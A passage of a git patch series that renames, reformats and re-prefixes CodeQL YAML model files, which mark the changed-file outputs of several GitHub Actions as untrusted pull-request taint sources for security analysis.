+ - [ "jitterbit/get-changed-files", "*", "added_modified", "pull_request", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "added_modified", "pull_request_target", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "deleted", "pull_request", "PR changed files" ] + - [ "jitterbit/get-changed-files", "*", "deleted", "pull_request_target", "PR changed files" ] \ No newline at end of file diff --git a/ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml similarity index 56% rename from ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml rename to ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 28517f44568..a9db2714746 100644 --- a/ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -4,6 +4,4 @@ extensions: extensible: summaryModel data: - [ "mad9000/actions-find-and-replace-string", "*", "source", "value", "taint" ] - - [ "mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint" ] - - [ "frabert/replace-string-action", "*", "string", "replaced", "taint" ] - - [ "frabert/replace-string-action", "*", "replace-with", "replaced", "taint" ] + - [ "mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint" ] \ No newline at end of file diff --git a/ql/lib/ext/tj-actions-changed-files.model.yml b/ql/lib/ext/tj-actions-changed-files.model.yml deleted file mode 100644 index a3f687a0611..00000000000 --- a/ql/lib/ext/tj-actions-changed-files.model.yml +++ /dev/null @@ -1,28 +0,0 @@ -extensions: - - addsTo: - pack: codeql/actions-all - extensible: sourceModel - data: - - [ "tj-actions/changed-files", "*", "added_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "any_changed", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "any_deleted", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "any_modified", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "changed_keys", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "copied_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "deleted_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_keys", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "only_changed", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "only_deleted", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "only_modified", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_changed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_deleted_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_modified_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "renamed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "type_changed_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "unknown_files", "*", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "unmerged_files", "*", "PR changed files" ] diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml new file mode 100644 index 00000000000..8e0189dcb67 --- /dev/null +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -0,0 +1,39 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - [ "tj-actions/changed-files", "*", "added_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "added_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "copied_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "copied_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "deleted_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "deleted_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "modified_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "modified_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "renamed_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "renamed_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "type_changed_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "type_changed_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "unmerged_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "unmerged_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "unknown_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "unknown_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_changed_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_changed_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "other_changed_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "other_changed_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_modified_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "all_modified_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "other_modified_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "other_modified_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "other_deleted_files", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "other_deleted_files", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "modified_keys", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "modified_keys", "pull_request_target", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "changed_keys", "pull_request", "PR changed files" ] + - [ "tj-actions/changed-files", "*", "changed_keys", "pull_request_target", "PR changed files" ] \ No newline at end of file diff --git a/ql/lib/ext/tj-actions_verify-changed-files.yml b/ql/lib/ext/tj-actions_verify-changed-files.yml new file mode 100644 index 00000000000..55aebb0d34a --- /dev/null +++ b/ql/lib/ext/tj-actions_verify-changed-files.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: sourceModel + data: + - [ "tj-actions/verify-changed-files", "*", "changed-files", "pull_request", "PR changed files" ] + - [ "tj-actions/verify-changed-files", "*", "changed-files", "pull_request_target", "PR changed files" ] From fa91837f63dbd6cd399066fa386c93b0bddd5309 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Tue, 13 Feb 2024 13:22:18 +0100 Subject: [PATCH 0026/1267] Trim yaml --- .../ext/ahmadnassri_action-changed-files.yml | 8 +-- ql/lib/ext/dorny_paths-filter.yml | 4 +- .../frabert_replace-string-action.model.yml | 4 +- ql/lib/ext/jitterbit_get-changed-files.yml | 28 ++++---- ..._actions-find-and-replace-string.model.yml | 4 +- ql/lib/ext/tj-actions_changed-files.model.yml | 68 +++++++++---------- .../ext/tj-actions_verify-changed-files.yml | 4 +- 7 files changed, 60 insertions(+), 60 deletions(-) diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.yml b/ql/lib/ext/ahmadnassri_action-changed-files.yml index c5e4df09e3a..bd86b3f843e 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.yml @@ -3,7 +3,7 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - [ "ahmadnassri/action-changed-files", "*", "files", "pull_request", "PR changed files" ] - - [ "ahmadnassri/action-changed-files", "*", "files", "pull_request_target", "PR changed files" ] - - [ "ahmadnassri/action-changed-files", "*", "json", "pull_request", "PR changed files" ] - - [ "ahmadnassri/action-changed-files", "*", "json", "pull_request_target", "PR changed files" ] + - ["ahmadnassri/action-changed-files", "*", "files", "pull_request", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "files", "pull_request_target", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "json", "pull_request", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "json", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/dorny_paths-filter.yml b/ql/lib/ext/dorny_paths-filter.yml index c78e9e08e70..c9cdd2dbcc0 100644 --- a/ql/lib/ext/dorny_paths-filter.yml +++ b/ql/lib/ext/dorny_paths-filter.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - [ "dorny/paths-filter", "*", "changes", "pull_request", "PR changed files" ] - - [ "dorny/paths-filter", "*", "changes", "pull_request_target", "PR changed files" ] + - ["dorny/paths-filter", "*", "changes", "pull_request", "PR changed files"] + - ["dorny/paths-filter", "*", "changes", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index e211fe2b69c..76ce81b394e 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: summaryModel data: - - [ "frabert/replace-string-action", "*", "string", "replaced", "taint" ] - - [ "frabert/replace-string-action", "*", "replace-with", "replaced", "taint" ] + - ["frabert/replace-string-action", "*", "string", "replaced", "taint"] + - ["frabert/replace-string-action", "*", "replace-with", "replaced", "taint"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.yml b/ql/lib/ext/jitterbit_get-changed-files.yml index 8d2798f3736..198e60d4245 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.yml @@ -3,17 +3,17 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - [ "jitterbit/get-changed-files", "*", "all", "pull_request", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "all", "pull_request_target", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "added", "pull_request", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "added", "pull_request_target", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "modified", "pull_request", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "modified", "pull_request_target", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "removed", "pull_request", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "removed", "pull_request_target", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "renamed", "pull_request", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "renamed", "pull_request_target", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "added_modified", "pull_request", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "added_modified", "pull_request_target", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "deleted", "pull_request", "PR changed files" ] - - [ "jitterbit/get-changed-files", "*", "deleted", "pull_request_target", "PR changed files" ] \ No newline at end of file + - ["jitterbit/get-changed-files", "*", "all", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "all", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "added", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "added", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "modified", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "modified", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "removed", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "removed", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "renamed", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "renamed", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "added_modified", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "added_modified", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "deleted", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "deleted", "pull_request_target", "PR changed files"] \ No newline at end of file diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index a9db2714746..46a577d2f7e 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: summaryModel data: - - [ "mad9000/actions-find-and-replace-string", "*", "source", "value", "taint" ] - - [ "mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint" ] \ No newline at end of file + - ["mad9000/actions-find-and-replace-string", "*", "source", "value", "taint"] + - ["mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint"] \ No newline at end of file diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index 8e0189dcb67..1ef816727e1 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -3,37 +3,37 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - [ "tj-actions/changed-files", "*", "added_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "added_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "copied_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "copied_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "deleted_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "deleted_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "renamed_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "renamed_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "type_changed_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "type_changed_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "unmerged_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "unmerged_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "unknown_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "unknown_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_changed_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_changed_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_changed_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_modified_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "all_modified_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_modified_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_modified_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_deleted_files", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "other_deleted_files", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_keys", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "modified_keys", "pull_request_target", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "changed_keys", "pull_request", "PR changed files" ] - - [ "tj-actions/changed-files", "*", "changed_keys", "pull_request_target", "PR changed files" ] \ No newline at end of file + - ["tj-actions/changed-files", "*", "added_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "added_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "copied_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "copied_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "deleted_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "deleted_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "modified_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "modified_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "renamed_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "renamed_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "type_changed_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "type_changed_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "unmerged_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "unmerged_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "unknown_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "unknown_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "all_changed_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "all_changed_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "other_changed_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "other_changed_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "all_modified_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "all_modified_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "other_modified_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "other_modified_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "other_deleted_files", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "other_deleted_files", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "modified_keys", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "modified_keys", "pull_request_target", "PR changed files"] + - ["tj-actions/changed-files", "*", "changed_keys", "pull_request", "PR changed files"] + - ["tj-actions/changed-files", "*", "changed_keys", "pull_request_target", "PR changed files"] \ No newline at end of file diff --git a/ql/lib/ext/tj-actions_verify-changed-files.yml b/ql/lib/ext/tj-actions_verify-changed-files.yml index 55aebb0d34a..076ecff353c 100644 --- a/ql/lib/ext/tj-actions_verify-changed-files.yml +++ b/ql/lib/ext/tj-actions_verify-changed-files.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - [ "tj-actions/verify-changed-files", "*", "changed-files", "pull_request", "PR changed files" ] - - [ "tj-actions/verify-changed-files", "*", "changed-files", "pull_request_target", "PR changed files" ] + - ["tj-actions/verify-changed-files", "*", "changed-files", "pull_request", "PR changed files"] + - ["tj-actions/verify-changed-files", "*", "changed-files", "pull_request_target", "PR changed files"] From 6627a858e379259e0f9dca2e1fbc54b0fbe5d736 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Tue, 13 Feb 2024 13:24:25 +0100 Subject: [PATCH 0027/1267] Suffix with `.model` --- ...anged-files.yml => ahmadnassri_action-changed-files.model.yml} | 0 .../ext/{dorny_paths-filter.yml => dorny_paths-filter.model.yml} | 0 ...et-changed-files.yml => jitterbit_get-changed-files.model.yml} | 0 ...hanged-files.yml => tj-actions_verify-changed-files.model.yml} | 0 4 files changed, 0 insertions(+), 0 deletions(-) rename ql/lib/ext/{ahmadnassri_action-changed-files.yml => ahmadnassri_action-changed-files.model.yml} (100%) rename ql/lib/ext/{dorny_paths-filter.yml => dorny_paths-filter.model.yml} (100%) rename ql/lib/ext/{jitterbit_get-changed-files.yml => jitterbit_get-changed-files.model.yml} (100%) rename ql/lib/ext/{tj-actions_verify-changed-files.yml => tj-actions_verify-changed-files.model.yml} (100%) diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml similarity index 100% rename from ql/lib/ext/ahmadnassri_action-changed-files.yml rename to ql/lib/ext/ahmadnassri_action-changed-files.model.yml diff --git a/ql/lib/ext/dorny_paths-filter.yml b/ql/lib/ext/dorny_paths-filter.model.yml similarity index 100% rename from ql/lib/ext/dorny_paths-filter.yml rename to ql/lib/ext/dorny_paths-filter.model.yml diff --git a/ql/lib/ext/jitterbit_get-changed-files.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml similarity index 100% rename from ql/lib/ext/jitterbit_get-changed-files.yml rename to ql/lib/ext/jitterbit_get-changed-files.model.yml diff --git a/ql/lib/ext/tj-actions_verify-changed-files.yml b/ql/lib/ext/tj-actions_verify-changed-files.model.yml similarity index 100% rename from ql/lib/ext/tj-actions_verify-changed-files.yml rename to ql/lib/ext/tj-actions_verify-changed-files.model.yml From 29b3d6c9efe6993bf23dfb586c31e1a79939ac57 Mon Sep 17 00:00:00 2001 From: jorgectf Date: Tue, 13 Feb 2024 15:00:53 +0100 Subject: [PATCH 0028/1267] Prefix sources with `output.` --- ...ahmadnassri_action-changed-files.model.yml | 8 +-- ql/lib/ext/dorny_paths-filter.model.yml | 4 +- .../ext/jitterbit_get-changed-files.model.yml | 28 ++++---- ql/lib/ext/tj-actions_changed-files.model.yml | 68 +++++++++---------- .../tj-actions_verify-changed-files.model.yml | 4 +- 5 files changed, 56 insertions(+), 56 deletions(-) diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index bd86b3f843e..3308967eebc 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -3,7 +3,7 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - ["ahmadnassri/action-changed-files", "*", "files", "pull_request", "PR changed files"] - - ["ahmadnassri/action-changed-files", "*", "files", "pull_request_target", "PR changed files"] - - ["ahmadnassri/action-changed-files", "*", "json", "pull_request", "PR changed files"] - - ["ahmadnassri/action-changed-files", "*", "json", "pull_request_target", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request_target", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/dorny_paths-filter.model.yml b/ql/lib/ext/dorny_paths-filter.model.yml index c9cdd2dbcc0..d2b2ed48fc5 100644 --- a/ql/lib/ext/dorny_paths-filter.model.yml +++ b/ql/lib/ext/dorny_paths-filter.model.yml @@ -3,5 +3,5 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - ["dorny/paths-filter", "*", "changes", "pull_request", "PR changed files"] - - ["dorny/paths-filter", "*", "changes", "pull_request_target", "PR changed files"] + - ["dorny/paths-filter", "*", "output.changes", "pull_request", "PR changed files"] + - ["dorny/paths-filter", "*", "output.changes", "pull_request_target", "PR changed files"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index 198e60d4245..bc7344eedca 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -3,17 +3,17 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - ["jitterbit/get-changed-files", "*", "all", "pull_request", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "all", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "added", "pull_request", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "added", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "modified", "pull_request", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "removed", "pull_request", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "removed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "renamed", "pull_request", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "renamed", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "added_modified", "pull_request", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "added_modified", "pull_request_target", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "deleted", "pull_request", "PR changed files"] - - ["jitterbit/get-changed-files", "*", "deleted", "pull_request_target", "PR changed files"] \ No newline at end of file + - ["jitterbit/get-changed-files", "*", "output.all", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.all", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.added", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.added", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.modified", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.removed", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.renamed", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.added_modified", "pull_request_target", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request", "PR changed files"] + - ["jitterbit/get-changed-files", "*", "output.deleted", "pull_request_target", "PR changed files"] \ No newline at end of file diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml index 1ef816727e1..b3b8baed7fc 100644 --- a/ql/lib/ext/tj-actions_changed-files.model.yml +++ b/ql/lib/ext/tj-actions_changed-files.model.yml @@ -3,37 +3,37 @@ extensions: pack: codeql/actions-all extensible: sourceModel data: - - ["tj-actions/changed-files", "*", "added_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "added_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "copied_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "copied_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "deleted_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "modified_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "renamed_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "type_changed_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "type_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "unmerged_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "unmerged_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "unknown_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "unknown_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "all_changed_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "all_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "other_changed_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "other_changed_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "all_modified_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "all_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "other_modified_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "other_modified_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "other_deleted_files", "pull_request", "PR changed files"] - - ["tj-actions/changed-files", "*", "other_deleted_files", "pull_request_target", "PR changed files"] - - ["tj-actions/changed-files", "*", "modified_keys", "pull_request", "PR changed 